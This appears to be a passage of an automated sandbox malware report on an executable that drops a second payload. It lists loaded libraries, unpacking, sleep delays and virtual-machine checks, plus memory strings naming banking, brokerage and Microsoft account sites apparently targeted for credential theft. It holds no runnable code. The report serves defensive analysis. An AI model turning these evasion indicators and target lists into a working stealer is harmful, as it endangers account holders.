        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeUnpacked PE file: 0.2.IH5XqCdf06.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeUnpacked PE file: 3.2.5734.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeUnpacked PE file: 0.2.IH5XqCdf06.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeUnpacked PE file: 3.2.5734.tmp.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0060339D push 00000003h; ret 0_2_006033A1
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006015F2 push es; iretd 0_2_00601603
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006059AA pushad ; ret 0_2_006059C6
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00605B28 push ecx; ret 0_2_00605B45
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00602EFC pushad ; ret 0_2_00602F24
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006509CD push ecx; ret 0_2_006509E0
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0067799F push esp; retf 0_2_006779A7
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0065CE18 push ss; retf 0_2_0065CE1D
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0064FFF3 push ecx; ret 0_2_00650006
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00677F9D push esp; retf 0_2_00677F9E
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004499A1 push esp; ret 3_2_004499A2
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0044AAD0 push ecx; retn 0041h3_2_0044AAD5
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_02082361 push 00000004h; ret 3_2_02082375
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020830C7 push 0F56897Eh; iretd 3_2_020830DF
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0208646F push ebp; ret 3_2_02086470
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_02083CDA push esi; retn 001Ch3_2_02083CDE
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E1A8C pushad ; retf 0044h3_2_020E1A93
        Source: IH5XqCdf06.exeStatic PE information: section name: .text entropy: 7.876615691917127
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.831859637421663
        Source: 5734.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.831859637421663
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exeJump to dropped file
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeFile created: C:\Users\user\AppData\Local\Temp\5734.tmp.exeJump to dropped file
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeWindow / User API: threadDelayed 4096Jump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeWindow / User API: threadDelayed 5895Jump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65033
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeAPI coverage: 5.1 %
        Source: C:\Users\user\Desktop\IH5XqCdf06.exe TID: 3796Thread sleep count: 4096 > 30Jump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exe TID: 3796Thread sleep time: -2957312s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exe TID: 3796Thread sleep count: 5895 > 30Jump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exe TID: 3796Thread sleep time: -4256190s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exe TID: 5764Thread sleep time: -150000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00678C59 FindFirstFileExW,0_2_00678C59
        Source: Amcache.hve.6.drBinary or memory string: VMware
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
        Source: IH5XqCdf06.exe, 00000000.00000002.4569947875.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000002.2291082783.000000000048A000.00000004.00000020.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
        Source: IH5XqCdf06.exe, 00000000.00000002.4569947875.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPfs%SystemRoot%\system32\mswsock.dll|
        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
        Source: 5734.tmp.exe, 00000003.00000003.2208731070.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeAPI call chain: ExitProcess graph end nodegraph_3-27424
